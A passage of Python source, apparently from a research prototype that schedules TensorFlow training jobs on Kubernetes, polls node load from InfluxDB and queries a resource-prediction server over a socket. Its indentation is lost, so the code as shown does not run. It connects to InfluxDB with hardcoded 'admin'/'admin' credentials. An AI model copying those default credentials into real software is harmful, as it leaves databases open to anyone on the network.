'cpu_allocate': job.cpu_allocate,
'memory_allocate':job.memory_allocate,
'node_compute': job.node_compute[ns_layout[node]],
'node_cmtype': job.node_cmtype[ns_layout[node]],
'node_disk': job.node_disk[ns_layout[node]],
'batch': batch,
'flops':flops,
'params':params,
'ps':job.ps_replicas,
'worker':job.worker_replicas
}
}
points.append(content)
print(points[0])
try:
step_influx_client.write_points(points, 's', database="PREDICT")
print("Success to write a point!")
except Exception as e:
print(e)
time_base = math.floor(min(time_base_list))
print(time_base)
time_sleep = max(time_avg)*8
time.sleep(time_sleep)
break
else:
time.sleep(10)
# res = client.query("select * from " + measure_s + " where nodes='worker0' order by desc limit 10")
try:
res = step_influx_client.query(
"select * from " + measure_s + " where time >= " + time_query_str + " group by nodes order by asc limit 10")
keys = res.keys()
except Exception as e1:
print(e1)
mana = mana + 1
if jieshu:
print("Please check the error!!!")
return
while True:
if tasks['start']==False:
break
# lock.acquire()
tmp_ns = tasks["ns"]
# lock.release()
if job.name not in tmp_ns :
break
pod_status = [i.status.phase for i in job.v1.list_namespaced_pod(job_name).items]
if 'Succeeded' in pod_status or 'Failed' in pod_status:
break
time_query_str = make_time_query(time_base, mode=0)
res = step_influx_client.query(
"select * from " + measure_s + " where time >= " + time_query_str + " group by nodes order by asc limit 10")
keys = res.keys()
node_list = [b['nodes'] for a, b in keys]
dic_msg = {}
for node in node_list:
for i in range(len(keys)):
_, no = keys[i]
if no['nodes'] == node:
dic_msg[node] = list(res[keys[i]])
time_base_list = []
time_low_list = []
time_node_avg = {}
time_avg = []
step_hight_list = []
for node in node_list:
time_low_list.append(match_timestamp(dic_msg[node][0]['time']))
time_base_list.append(match_timestamp(dic_msg[node][-1]['time']))
time_avg_list = [float(i['time_d']) for i in dic_msg[node]]
# step_base_list.append(int(dic_msg[node][-1]['step']))
step_hight_list.append(int(dic_msg[node][-1]['step']))
time_avg_node = np.mean(time_avg_list)
time_node_avg[node] = time_avg_node
time_avg.append(time_avg_node)
time_low = math.floor(min(time_low_list) - 7)
time_high = math.ceil(max(time_base_list) + 8)
step_high = max(step_hight_list)
print("step high is %d" % step_high)
print(step_hight_list)
time_low_str = make_time_query(time_low, mode=0)
time_high_str = make_time_query(time_high, mode=1)
# result = self.influx_client.query("select * from "+"NODEMESSAGE"+" group by nodes order by desc limit 3")
load_result = node_influx_client.query(
"select * from NODEMESSAGE where time >= " + time_low_str + " and time <= " + time_high_str + " group by nodes order by asc")
total_worker_node_list = job.get_node_list()
result_keys = load_result.keys()
worker_nodes = [i[-1]['nodes'] for i in result_keys]
worker_node_mg = [list(load_result[i]) for i in result_keys]
cpu_use = {}
total_cpu_use = 0.0
total_memory_use = 0.0
total_cpu = 0
total_memory = 0
memory_use = {}
for i in range(len(worker_node_mg)):
cpu_use[worker_nodes[i]] = 0
memory_use[worker_nodes[i]] = 0
for j in range(len(worker_node_mg[i])):
cpu_use[worker_nodes[i]] += worker_node_mg[i][j]['cpu']
memory_use[worker_nodes[i]] += worker_node_mg[i][j]['memory']
cpu_use[worker_nodes[i]] = (cpu_use[worker_nodes[i]] / len(worker_node_mg[i])) / job.node_cpu[
worker_nodes[i]]
memory_use[worker_nodes[i]] = (memory_use[worker_nodes[i]] / len(worker_node_mg[i])) / job.node_memory[
worker_nodes[i]]
total_cpu_use += (cpu_use[worker_nodes[i]]*job.node_cpu[worker_nodes[i]])
total_cpu += job.node_cpu[worker_nodes[i]]
total_memory_use += (memory_use[worker_nodes[i]]*job.node_memory[worker_nodes[i]])
total_memory += job.node_memory[worker_nodes[i]]
total_cpu_use = total_cpu_use / total_cpu
total_memory_use = total_memory_use / total_memory
points = []
# # content = {}
# timestamp = response['items'][0]['metadata']['creationTimestamp']
for node in node_list:
content = {
'measurement': measure_load,
'tags': {
"nodes": node,
"workerpoint":ns_layout[node],
"task_id": job.task_id,
"runtimes":job.rtimes,
"retry":job.retry
},
'fields': {
'node_cpu': cpu_use[ns_layout[node]],
'node_memory': memory_use[ns_layout[node]],
'time_avg': time_node_avg[node],
'total_cpu': total_cpu_use,
'total_memory': total_memory_use,
'cpu_allocate': job.cpu_allocate,
'memory_allocate': job.memory_allocate,
'node_compute': job.node_compute[ns_layout[node]],
'node_cmtype': job.node_cmtype[ns_layout[node]],
'node_disk': job.node_disk[ns_layout[node]],
'batch': batch,
'flops': flops,
'params': params,
'ps': job.ps_replicas,
'worker': job.worker_replicas
}
}
points.append(content)
step_influx_client.write_points(points, 's', database="PREDICT")
print("write a point success!!!")
time_base = math.floor(min(time_base_list))
try:
print("now running: %d " % (step_high - step_base))
except Exception as e:
print(e)
if step_high - step_base >= 20:
alpha = random.randint(0, 5) * 0.1 + 0.5
beta = random.randint(0,5)*0.1+0.87
print("before apply:%d" % job.cpu_allocate)
job.set_resource(cpu_source=(math.ceil(job.cpu_allocate * alpha)), mem_source=(math.ceil(job.memory_allocate * beta)))
try:
job.assignment_resource(cpu_source=(math.ceil(job.cpu_allocate * alpha)),memory_source=(math.ceil(job.memory_allocate * beta)))
except Exception as e0:
print(e0)
print("apply job success!")
print("after apply: %d" % job.cpu_allocate)
step_base = step_high
write_step_base(job.name,step_base)
print("now step base is %d" % step_base)
print("next select based on time %d" % time_base)
time_sleep = max(time_avg) * 8
time.sleep(time_sleep)
# result = step_influx_client.query("select * from " + measure_s + " group by nodes order by desc limit 3")
# 1580976233000000000
def get_load_value(node_index,cpu_base,memory_base,total_cpu_base,total_memory_base):
keys = node_index.keys()
alpha = 0.62
cpu_score = 0
memory_score = 0
node_use = []
node_cpu = []
node_mem = []
for key in keys:
if node_index[key] < 3:
node_use.append(key)
for key in node_use:
cpu_score+= cpu_base[key]
node_cpu.append(cpu_base[key])
memory_score+= memory_base[key]
node_mem.append(memory_base[key])
cpu_score = cpu_score/len(node_use)
memory_score = memory_score/len(node_use)
cpu_score = alpha*cpu_score+(1-alpha)*total_cpu_base
memory_score = alpha*memory_score+(1-alpha)*total_memory_base
return cpu_score,memory_score,node_cpu,node_mem
def Submit_job(tasks,lock,v1,jobs):
global LOSSHOST,LOSSPORT
ADDR = (LOSSHOST,LOSSPORT)
max_buffer_size = 4
job_basic = reload_jobs(tasks['last'],-1)
max_free_heap = MaxHeap(max_size=max_buffer_size,fn=worker_queue.value_free_load)
max_wight_heap = MaxHeap(max_size=max_buffer_size,fn=worker_queue.value_weight_load)
worker_buffer = tasks['buffer']
first_reload = False
time.sleep(20)
if worker_buffer:
first_reload = True
pool = multiprocessing.Pool(processes=5)
for job0 in jobs:
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job0, job0)
#job_res_config = {'deadline':job.deadline,'start_time':job.starttime,
# 'cpu_source':job.cpu_allocate,'mem_source':job.memory_allocate,
# 'cpu_high':cpu_base,'batch_res':batch_res,
# 'flops_res':flops_res,'params_res':params_res}
res_config = load_config(save_res_path)
batch_res = res_config['batch_res']
flops_res = res_config['flops_res']
params_res = res_config['params_res']
# catch_node_step_msg(jobs=,job_name=,tasks=,lock=,batch=,flops=,params=,mode=)
pool.apply_async(catch_node_step_msg,args=(jobs,job0,tasks,lock,batch_res,flops_res,params_res,-1))
while True:
if tasks['start']==False:
break
lock.acquire()
counts = tasks['count']
bufer_count = tasks['buffercount']
lock.release()
if (counts >= tasks['size']) and (bufer_count >= max_buffer_size):
time.sleep(float(random.randint(10,15)))
pass
elif tasks['next'] and counts < tasks['size']:
job_name = tasks['next']
job = reload_jobs(job_name,-1)
node_index, cpu_nodes, memory_nodes, total_cpu_use, total_mem_use = job_basic.schedule_base()
# mem_need = job.total_mem * total_mem_use + job.worker_replicas * job.memory_allocate + 2048 * job.ps_replicas
# cpu_need = job.total_cpu * total_cpu_use + job.worker_replicas * job.cpu_allocate + 1000 * job.ps_replicas
catch_worker = 0
catch_ps = 0
node_keys = cpu_nodes.keys()
for key in node_keys:
catch_ps_c = 0
catch_ps_m = 0
catch_worker_c = 0
catch_worker_m = 0
can_use_cpu = job.node_cpu[key] * (1 - cpu_nodes[key])
can_use_mem = job.node_memory[key] * (1 - memory_nodes[key])
first_try = True
endcpu = False
endmem = False
while (not endcpu) or (not endmem):
if first_try:
if can_use_cpu - 1000 > 0:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
if can_use_cpu - job.cpu_allocate > 0:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
if can_use_mem - 2048 > 0:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
if can_use_mem - job.memory_allocate > 0:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
first_try = False
else:
if can_use_cpu - job.cpu_allocate > 0:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
else:
if can_use_cpu - 1000 > 0:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
endcpu = True
if can_use_mem - job.memory_allocate > 0:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
else:
if can_use_mem - 2048 > 0:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
endmem = True
if catch_worker_c < catch_worker_m:
catch_worker += catch_worker_c
else:
catch_worker += catch_worker_m
if catch_ps_c < catch_ps_m:
catch_ps += catch_ps_c
else:
catch_ps += catch_ps_m
if catch_ps >= 1 and catch_worker>=1:
break
if catch_ps > 0 and catch_worker > 0:
lock.acquire()
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
tasks['next'] = ''
lock.release()
else:
time.sleep(30)
else:
time.sleep(150)
deadline = random.randint(3600, 18000)
if tasks['reload'] == 0:
template_id = random.randint(1, 4)
print(template_id)
lock.acquire()
tmp1 = tasks['task_id']
tmp1[template_id - 1] += 1
tasks['task_id'] = tmp1
tmp2 = tasks['rtimes']
tmp2[template_id - 1] += 1
tasks['rtimes'] = tmp2
# tasks['ps_replicas'][template_id - 1] = random.randint(1, 3)
# tasks['worker_replicas'][template_id - 1] = random.randint(2, 6)
# tasks['batch_size'][template_id - 1] = random.randint(128, 1024)
lock.release()
ps_r = random.randint(1, 3)
worker_r = random.randint(1, 4)
batch = random.randint(128, 1024)
measure = "VGG 1"
print(tasks)
if template_id == 1:
channels = [24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400, 480,
512,
576]
x1 = random.randint(0, 4)
x2 = random.randint(4, 7)
x3 = random.randint(7, 11)
x4 = random.randint(11, 15)
x5 = random.randint(15, 19)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
channel5 = channels[x5]
num_layer1 = random.randint(2, 4)
num_layer2 = random.randint(2, 4)
num_layer3 = random.randint(3, 6)
num_layer4 = random.randint(3, 8)
num_layer5 = random.randint(3, 8)
# def __init__(self,v1,template_id,ps_replicas,worker_replicas,training_step,batch_size,interval,task_id,rtimes,tag,repeat,channel1,channel2,channel3,channel4,channel5,channel6,channel7,channel8,dbhost='192.168.128.10', retry=0, update_min_step=400, step_update=200, update_start=0.25,
# update_end=0.75, update_delay=2.0):
job = VGGTask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], channel1=channel1, channel2=channel2,
channel3=channel3,
channel4=channel4, channel5=channel5,
num_layer1=num_layer1, num_layer2=num_layer2, num_layer3=num_layer3,
num_layer4=num_layer4,
num_layer5=num_layer5
)
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'channel5': job.channel5,
'num_layer1': job.num_layer1, 'num_layer2': job.num_layer2,
'num_layer3': job.num_layer3,
'num_layer4': job.num_layer4,
'num_layer5': job.num_layer5}
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4,
'channel5': channel5, 'num_layer1': num_layer1, 'num_layer2': num_layer2,
'num_layer3': num_layer3, 'num_layer4': num_layer4, 'num_layer5': num_layer5}
elif template_id == 2:
bottle = random.randint(0, 1)
channels = [24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400, 480,
512,
576]
x1 = random.randint(0, 3)
x2 = random.randint(1, 7)
x3 = random.randint(8, 14)
x4 = random.randint(14, 19)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
layer1 = random.randint(2, 6)
layer2 = random.randint(2, 8)
layer3 = random.randint(2, 40)
layer4 = random.randint(2, 6)
job = RESTask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], bottle=bottle, layer1=layer1, layer2=layer2,
layer3=layer3,
layer4=layer4, channel1=channel1, channel2=channel2, channel3=channel3,
channel4=channel4)
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'bottle': job.bottle, 'layer1': job.layer1, 'layer2': job.layer2,
'layer3': job.layer3,
'layer4': job.layer4, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4}
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4,
'layer1': layer1, 'layer2': layer2,
'layer3': layer3, 'layer4': layer4, 'bottle': bottle}
elif template_id == 3:
stack = random.randint(3, 16)
channels = [12, 16, 24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400,
480,
512, 576]
x1 = random.randint(0, 3)
x2 = random.randint(2, 5)
x3 = random.randint(6, 11)
x4 = random.randint(6, 11)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
job = RETask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1], rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], stack=stack, channel1=channel1,
channel2=channel2,
channel3=channel3, channel4=channel4
)
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4, 'stack_num': stack}
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'stack': job.stack, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4
}
elif template_id == 4:
repeat = random.randint(4, 12)
channels = [12, 16, 24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400,
480,
512, 576, 640, 728, 856, 920, 960, 1024, 1280, 1408, 1536, 1600, 1728, 2048, 2096]
x1 = random.randint(0, 5)
x2 = random.randint(3, 9)
x3 = random.randint(9, 12)
x4 = random.randint(12, 18)
x5 = random.randint(19, 24)
x6 = random.randint(26, 28)
x7 = random.randint(29, 31)
x8 = random.randint(32, 34)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
channel5 = channels[x5]
channel6 = channels[x6]
channel7 = channels[x7]
channel8 = channels[x8]
job = XCETask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1], tag=tasks['tag'][template_id - 1],
repeat=repeat,
channel1=channel1, channel2=channel2, channel3=channel3,
channel4=channel4, channel5=channel5, channel6=channel6, channel7=channel7,
channel8=channel8)
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id,
'rtimes': job.rtimes, 'tag': job.tag, 'repeat': job.repeat, 'channel1': job.channel1,
'channel2': job.channel2, 'channel3': job.channel3, 'channel4': job.channel4,
'channel5': job.channel5,
'channel6': job.channel6, 'channel7': job.channel7, 'channel8': job.channel8
}
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4, 'channel5': channel5, 'channel6': channel6, 'channel7': channel7,
'channel8': channel8, 'repeat': repeat}
else:
Ls = [16, 32, 40, 48, 50, 60, 64, 80, 100, 120, 128, 160, 180, 200, 240, 250, 256]
ks = [8, 10, 12, 16, 24, 32, 40, 48]
x1 = random.randint(0, 16)
x2 = random.randint(0, 7)
L = Ls[x1]
k = ks[x2]
BC = random.randint(0, 1)
job = DENTask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], L=L, k=k, BC=BC)
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'L': job.L, 'k': job.k, 'BC': job.BC
}
# batch, flops, params = denfpmodel.denfp(batch=256, BC=0, k=24, L=100, num_classes=10)
dict = {'batch': batch, 'BC': BC, 'k': k, 'L': L, 'num_classes': 10}
measure = job.measure
lock.acquire()
# tmp_reload = tasks['reload']
# tmp_reload = tmp_reload+1
# tasks['reload'] = tmp_reload
tasks['base'] = job.name
lock.release()
else:
job_base_name = tasks['base']
job_base_name_list = job_base_name.split('-')
if job_base_name_list[0] == 'vgg':
template_id = 1
elif job_base_name_list[0] == 'res':
template_id = 2
elif job_base_name_list[0] == 're':
template_id = 3
elif job_base_name_list[0] == 'xception':
template_id = 4
else:
template_id = 5
lock.acquire()
tmp1 = tasks['task_id']
tmp1[template_id - 1] += 1
tasks['task_id'] = tmp1
tmp2 = tasks['rtimes']
tmp2[template_id - 1] += 1
tasks['rtimes'] = tmp2
# tasks['ps_replicas'][template_id - 1] = random.randint(1, 3)
# tasks['worker_replicas'][template_id - 1] = random.randint(2, 6)
# tasks['batch_size'][template_id - 1] = random.randint(128, 1024)
lock.release()
tmp_task_id = tmp1[template_id - 1]
job = reload_jobs(job_base_name, task_id=tmp_task_id)
if template_id == 1:
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'channel5': job.channel5,
'num_layer1': job.num_layer1, 'num_layer2': job.num_layer2,
'num_layer3': job.num_layer3,
'num_layer4': job.num_layer4,
'num_layer5': job.num_layer5}
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4,
'channel5': job.channel5, 'num_layer1': job.num_layer1, 'num_layer2': job.num_layer2,
'num_layer3': job.num_layer3, 'num_layer4': job.num_layer4,
'num_layer5': job.num_layer5}
elif template_id == 2:
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'bottle': job.bottle, 'layer1': job.layer1, 'layer2': job.layer2,
'layer3': job.layer3,
'layer4': job.layer4, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4}
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4,
'layer1': job.layer1, 'layer2': job.layer2,
'layer3': job.layer3, 'layer4': job.layer4, 'bottle': job.bottle}
elif template_id == 3:
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'stack_num': job.stack}
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'stack': job.stack, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4
}
elif template_id == 4:
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id,
'rtimes': job.rtimes, 'tag': job.tag, 'repeat': job.repeat, 'channel1': job.channel1,
'channel2': job.channel2, 'channel3': job.channel3, 'channel4': job.channel4,
'channel5': job.channel5,
'channel6': job.channel6, 'channel7': job.channel7, 'channel8': job.channel8
}
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'channel5': job.channel5, 'channel6': job.channel6,
'channel7': job.channel7,
'channel8': job.channel8, 'repeat': job.repeat}
else:
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'L': job.L, 'k': job.k, 'BC': job.BC
}
# batch, flops, params = denfpmodel.denfp(batch=256, BC=0, k=24, L=100, num_classes=10)
dict = {'batch': job.batch_size, 'BC': job.BC, 'k': job.k, 'L': job.L, 'num_classes': 10}
measure = job.measure
lock.acquire()
if tasks['count'] < tasks['size'] or tasks['buffercount'] < max_buffer_size:
#loss_client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#loss_client.connect(ADDR)
client_pre = influxdb.InfluxDBClient(host=job.dbhost, port=8086, username='admin', password='admin',
database="PREDICT")
pre_list = measure.split(" ")
measure_s = pre_list[0] + 'S' + pre_list[-1]
measure_t = pre_list[0] + 'T' + pre_list[-1]
step_items = [
{
'measurement': measure_t,
'tags': {
'task': job.task_id,
'runtimes': job.rtimes,
'retry': job.retry
},
'fields': {
'training_step': job.training_step
}
}
]
# print(step_to_train)
client_pre.write_points(step_items, time_precision="ms", database="PREDICT")
# if job.training_step > 200:
loss_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loss_client.connect(ADDR)
loss_client.send(bytes(measure, 'utf-8'))
connect_try = 5
try_times = 1
connected = False
while True:
if try_times > connect_try:
break
msg_from_server = loss_client.recv(4096)
if not msg_from_server:
break
msg_from_server_str = str(msg_from_server.decode('utf-8'))
msg_from_server_list = msg_from_server_str.split(" ")
if msg_from_server_list[0] == '400':
connected = True
break
loss_client.send(bytes(measure, 'utf-8'))
try_times = try_times + 1
if not connected:
print("Connected or send message error!")
loss_client.close()
continue
print(msg_from_server_str)
print("connected success!")
dict_json = json.dumps(dict)
loss_client.send(bytes(dict_json, 'utf-8'))
ress = loss_client.recv(4096)
ress_str = str(ress.decode('utf-8'))
ress_lists = ress_str.split(' ')
if ress_lists[0] == '400':
batch_res = int(ress_lists[1])
flops_res = int(ress_lists[2])
params_res = int(ress_lists[3])
cpu_predict = float(ress_lists[-2])
cpu_base = math.ceil(1.12*cpu_predict)
mem_predict = float(ress_lists[-1])
mem_base = math.ceil(1.35*mem_predict)
res_to_server = '1'
loss_client.send(bytes(res_to_server, 'utf-8'))
else:
res_to_server = '0'
loss_client.send(bytes(res_to_server, 'utf-8'))
loss_client.close()
continue
loss_client.close()
# lock.acquire()
tmp_reload = tasks['reload']
# lock.release()
if tmp_reload == 0:
alpha = 1
beta = 1
else:
alpha = random.randint(2,12)*0.1+0.5
beta = random.randint(0,10)*0.1+1
# alpha = 1
# beta = 1
job.set_resource(cpu_source=(math.ceil(cpu_base * alpha)), mem_source=(math.ceil(mem_base * beta)))
start_time = '%.3f' % time.time()
start_time = float(start_time)
job.set_deadline(deadline=deadline, start_time=start_time)
job_res_config = {'deadline': job.deadline, 'start_time': job.starttime, 'cpu_source': job.cpu_allocate,
'mem_source': job.memory_allocate, 'cpu_high': cpu_base, 'memory_base': mem_base,'batch_res': batch_res,
'flops_res': flops_res, 'params_res': params_res,'step_base':0}
save_config_dir = task_submit.check_path(job.name)
save_job_path = '/tfdata/k8snfs/%s/%s.json' % (job.name, job.name)
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job.name, job.name)
save_config(job_config, save_job_path)
save_config(job_res_config, save_res_path)
if tasks['count'] < tasks['size'] and tasks['buffercount'] == 0:
node_index, cpu_nodes, memory_nodes, total_cpu_use, total_mem_use = job_basic.schedule_base()
cpu_value, mem_value, cpu_node_value, mem_node_value = get_load_value(node_index=node_index,
cpu_base=cpu_nodes,
memory_base=memory_nodes,
total_cpu_base=total_cpu_use,
total_memory_base=total_mem_use)
if cpu_value < 0.4:
job.worker_replicas = random.randint(4,6)
elif cpu_value < 0.7:
job.worker_replicas = random.randint(3, 4)
else:
job.worker_replicas = random.randint(1,2)
job.ps_replicas = random.randint(math.ceil(job.worker_replicas / 4),
math.ceil(job.worker_replicas / 2))
save_job_change_layout(job.name,job.ps_replicas,job.worker_replicas)
mem_need = job.total_mem*total_mem_use + job.worker_replicas*job.memory_allocate+2048*job.ps_replicas
cpu_need = job.total_cpu*total_cpu_use+job.worker_replicas*job.cpu_allocate+1000*job.ps_replicas
catch_worker = 0
catch_ps = 0
node_keys = cpu_nodes.keys()
reach_ps = False
reach_worker = False
for key in node_keys:
catch_ps_c = 0
catch_ps_m = 0
catch_worker_c = 0
catch_worker_m = 0
can_use_cpu = job.node_cpu[key]*(1-cpu_nodes[key])
can_use_mem = job.node_memory[key] * (1 - memory_nodes[key])
first_try = True
endcpu = False
endmem = False
while (not endcpu) or (not endmem):
if first_try:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c+=1
can_use_cpu = can_use_cpu - 1000
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c+=1
can_use_cpu = can_use_cpu - job.cpu_allocate
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m+=1
can_use_mem = can_use_mem - 2048
else:
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m+=1
can_use_mem = can_use_mem - job.memory_allocate
first_try = False
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
else:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
endcpu = True
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
else:
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
endmem = True
if catch_worker_c < catch_worker_m:
catch_worker += catch_worker_c
else:
catch_worker += catch_worker_m
if catch_ps_c < catch_ps_m:
catch_ps += catch_ps_c
else:
catch_ps += catch_ps_m
if catch_ps >= job.ps_replicas:
reach_ps = True
if catch_worker >= job.worker_replicas:
reach_worker = True
if catch_ps >= job.ps_replicas and catch_worker >= job.worker_replicas:
break
print("catch_ps: %d catch_worker: %d" % (catch_ps,catch_worker))
if catch_ps < job.ps_replicas or catch_worker < job.worker_replicas:
if catch_ps >0 and catch_worker > 0:
if catch_worker > job.worker_replicas:
catch_worker = job.worker_replicas
if catch_ps > job.ps_replicas:
catch_ps = job.ps_replicas
job.ps_replicas = catch_ps
job.worker_replicas = catch_worker
save_job_change_layout(job.name,catch_ps,catch_worker)
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
else:
job.ps_replicas = 1
job.worker_replicas = 1
save_job_change_layout(job.name, 1, 1)
tasks['next'] = job.name
# tasks['next'] = job.name
else:
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
